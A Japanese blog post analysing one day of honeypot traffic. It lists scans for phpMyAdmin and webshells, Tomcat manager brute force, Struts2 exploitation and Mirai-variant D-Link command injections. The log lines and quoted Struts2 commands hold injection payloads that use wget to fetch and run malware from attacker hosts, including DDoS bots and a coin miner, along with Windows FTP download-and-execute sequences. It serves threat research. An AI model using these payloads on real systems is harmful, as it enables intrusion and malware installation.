ハニーポットのログ分析(2018/09/15)
WOWhoneypotの2018/09/15(土) (運用102日目)の簡易分析です。
本日の総アクセス件数は 199件です。以下が全アクセスログです。
50 2018-09-15 GET /manager/html
31 2018-09-15 GET /
8 2018-09-15 GET /index.action
3 2018-09-15 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
3 2018-09-15 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.106.251/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
3 2018-09-15 GET hxxp://www.ip.cn/
3 2018-09-15 GET hxxp://www.123cha.com/
3 2018-09-15 CONNECT www.baidu.com:443
3 2018-09-15 CONNECT cn.bing.com:443
2 2018-09-15 GET /www/phpMyAdmin/index.php
2 2018-09-15 GET /web/phpMyAdmin/index.php
2 2018-09-15 GET /phpMyAdmin/index.php
2 2018-09-15 GET /cmd.php
2 2018-09-15 GET /claroline/phpMyAdmin/index.php
1 2018-09-15 POST /yao.php
1 2018-09-15 POST /xx.php
1 2018-09-15 POST /xw.php
1 2018-09-15 POST /xw1.php
1 2018-09-15 POST /xshell.php
1 2018-09-15 POST /w.php
1 2018-09-15 POST /wp-admins.php
1 2018-09-15 POST /weixiao.php
1 2018-09-15 POST /wc.php
1 2018-09-15 POST /s.php
1 2018-09-15 POST /qq.php
1 2018-09-15 POST /phpstudy.php
1 2018-09-15 POST /mx.php
1 2018-09-15 POST /m.php?pbid=open
1 2018-09-15 POST /lindex.php
1 2018-09-15 POST /feixiang.php
1 2018-09-15 POST /db.init.php
1 2018-09-15 POST /db__.init.php
1 2018-09-15 POST /db_desql.php
1 2018-09-15 POST /db_dataml.php
1 2018-09-15 POST /conflg.php
1 2018-09-15 POST /ak48.php
1 2018-09-15 HEAD /v3.0/web/assets/css/site.css
1 2018-09-15 HEAD /
1 2018-09-15 GET /z.php
1 2018-09-15 GET /x.php
1 2018-09-15 GET /wpo.php
1 2018-09-15 GET /wp-config.php
1 2018-09-15 GET /webdav/
1 2018-09-15 GET /uploader.php
1 2018-09-15 GET /typo3/phpmyadmin/index.php
1 2018-09-15 GET /text.php
1 2018-09-15 GET /test.php
1 2018-09-15 GET /shell.php
1 2018-09-15 GET /scripts/setup.php
1 2018-09-15 GET /robots.txt
1 2018-09-15 GET /pmd_online.php
1 2018-09-15 GET /pmd/index.php
1 2018-09-15 GET /pmamy/index.php
1 2018-09-15 GET /pmamy2/index.php
1 2018-09-15 GET /PMA/index.php
1 2018-09-15 GET /pma/index.php
1 2018-09-15 GET /PMA2/index.php
1 2018-09-15 GET /phpmyadmin/scripts/setup.php
1 2018-09-15 GET /phpMyAdmin/scripts/db___.init.php
1 2018-09-15 GET /phpmyadmin/phpmyadmin/index.php
1 2018-09-15 GET /phpMyAdminold/index.php
1 2018-09-15 GET /phpmyadmin-old/index.php
1 2018-09-15 GET /phpmyadmin/index.php
1 2018-09-15 GET /phpMyadmin_bak/index.php
1 2018-09-15 GET /phpmyadmin1/index.php
1 2018-09-15 GET /phpmyadmin0/index.php
1 2018-09-15 GET /phpmyadmin
1 2018-09-15 GET /phpadmin/index.php
1 2018-09-15 GET /mysql/index.php
1 2018-09-15 GET /myadmin/index.php
1 2018-09-15 GET /myadmin2/index.php
1 2018-09-15 GET /muhstiks.php
1 2018-09-15 GET /muhstik.php
1 2018-09-15 GET /muhstik-dpr.php
1 2018-09-15 GET /muhstik2.php
1 2018-09-15 GET /lol.php
1 2018-09-15 GET /log.php
1 2018-09-15 GET /logon.php
1 2018-09-15 GET /license.php
1 2018-09-15 GET /lala.php
1 2018-09-15 GET /lala-dpr.php
1 2018-09-15 GET /java.php
1 2018-09-15 GET /index.php
1 2018-09-15 GET /help.php
1 2018-09-15 GET /desktop.ini.php
1 2018-09-15 GET /db_pma.php
1 2018-09-15 GET /db/index.php
1 2018-09-15 GET /dbadmin/index.php
1 2018-09-15 GET /cmx.php
1 2018-09-15 GET /cmv.php
1 2018-09-15 GET /cmdd.php
1 2018-09-15 GET /admin/PMA/index.php
1 2018-09-15 GET /admin/pma/index.php
1 2018-09-15 GET /admin/phpmyadmin2/index.php
1 2018-09-15 GET /admin/mysql2/index.php
1 2018-09-15 GET /admin/index.php
phpMyAdmin関連(37件)とphpのWebShell設置(51件)と/へのアクセスを除外したアクセス数です。
50 2018-09-15 GET /manager/html
8 2018-09-15 GET /index.action
3 2018-09-15 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.173[.]159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
3 2018-09-15 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.106[.]251/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
3 2018-09-15 GET hxxp://www.ip[.]cn/
3 2018-09-15 GET hxxp://www.123cha[.]com/
3 2018-09-15 CONNECT www.baidu[.]com:443
3 2018-09-15 CONNECT cn.bing[.]com:443
1 2018-09-15 HEAD /v3.0/web/assets/css/site.css
また本日も「/manager/html」と、Tomcatの管理ページへのブルートフォース攻撃が来ています。
久々に「/index.action」と、Sturts2の脆弱性を突く攻撃が来ています。
単一のIPからで内容は以下です。
#cmd='…wget -P /root/ http://222.73.85[.]188:1996/.centos32;wget -P /root/ http://222.73.85[.]188:1996/.centos64;…'
#cmd='…wget -P /root/ http://222.73.85[.]188:1996/.yam;wget -P /root/ http://222.73.85[.]188:1996/install.sh;wget -P /root/ http://222.73.85[.]188:1996/config.json;…'
#cmd='…wget -c http://wap.tfddos[.]net:57843/linux;…'
#cmd='echo Open 127.0.0[.]1 21>C:\Ftp.bat&&…&&echo Get 1.exe C:\setup.exe>>C:\Ftp.bat&&…&&C:\Ftp.bat'
#cmd='echo open 107.179[.]45.135> c:\cmd.txt&…&echo get 1.exe>> c:\cmd.txt&…&start 1.exe&…'
このIPを調べてみると、よく見るマルウェア置き場になっています。
https://urlscan.io/result/db904ca7-698d-46b7-84bc-8a010127a3c9
例えば、.centos32を調べると、ZnaichというDDoSマルウェアです。
https://urlscan.io/sha256/9657fa3775d231bbeff443c32a53e61b70280f43604f8477294477e9cdfbb6d1
.yamはコインマイナーです。
https://urlscan.io/sha256/34d390a499d2098bce92e6b85b4858ee6255a7e2d4e03197ba4f6a759efe349c
「/login.cgi?」でアクセスのあるD-Linkを狙ったMirai亜種は本日は以下です。
3 User-Agent: LMAO/2.0
3 User-Agent: Hakai/2.0
不正中継を狙った通信が4種、計12件きています。
また、新しいものとして「HEAD /v3.0/web/assets/css/site.css 」というアクセスがあります。
調べてみると、9/10頃から各地のサーバにログとして残り始めているようです。
v3.0は含んでいませんが、「/web/assets/css/site.css 」で検索すると、以下のプロジェクトが出てきます。
https://github.com/opencfp/opencfp
phpベースの会議室システムのようです。ただし、最新リリースがv1.5.9のようですので、そこが気になりますが…。
HEADなので調査行為と思われます。
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
3 2018-09-15 wget hxxp://80.211.173.159/k
3 2018-09-15 wget hxxp://80.211.106.251/sh
2 2018-09-15 wget -c hxxp://wap.tfddos.net:57843/linux
1 2018-09-15 wget -P /root/ hxxp://222.73.85.188:1996/.yam;wget -P /root/ hxxp://222.73.85.188:1996/install.sh;wget -P /root/ hxxp://222.73.85.188:1996/config.json
1 2018-09-15 wget -P /root/ hxxp://222.73.85.188:1996/.centos32;wget -P /root/ hxxp://222.73.85.188:1996/.centos64
以上です。
